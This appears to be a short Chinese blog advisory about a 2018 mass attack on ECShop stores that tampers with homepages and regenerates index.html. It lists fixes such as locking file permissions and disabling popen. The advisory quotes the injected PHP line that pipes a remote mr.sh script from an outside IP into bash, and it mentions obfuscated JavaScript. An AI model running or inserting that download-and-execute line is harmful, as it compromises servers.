ecshop暴露大规模popen的mr.sh漏洞攻击

2018-09-10 20:27 来源:www.chinab4c.com 作者:admins

     在2018年ecshop暴露大规模popen的mr.sh漏洞攻击,其主要体现在ecshop的首页大量被修改,而且生成的ecshop首页内容都带有攻击代码,以及自动生成index.html,而且你删除之后立马又重新生成,我们如何解决ecshop暴露大规模popen的mr.sh漏洞攻击的攻击呢。

   1:ecshop暴露大规模popen的mr.sh漏洞攻击体现

    首先我们查看index.php页面是否有一下内容var __encode ='sojson.com', _0xb483=

    其次看下是否有PHP代码,PHP代码包含<?php $handle = popen("curl -s http://192.99.142.226:8220/mr.sh | bash -sh","r");?>;

  2:ecshop暴露大规模popen的mr.sh漏洞攻击遭殃

    首先你如果删除文件,会自动生成,无法删除掉。其次还可能删除ecshop根目录的php文件

  3:ecshop暴露大规模popen的mr.sh漏洞攻击如何解决

   3.1:我们有必要让PHP目录下面的PHP不要有修改权限

   3.2:我们创建一个index.html文件,同时让他无法写入

   3.3:我们关闭popen

   3.4:我们在nginx下面不要设置index.html等首页

    通过以上方式,可以很容易解决ecshop暴露大规模popen的mr.sh漏洞攻击,相关ecshop漏洞攻击请点击查看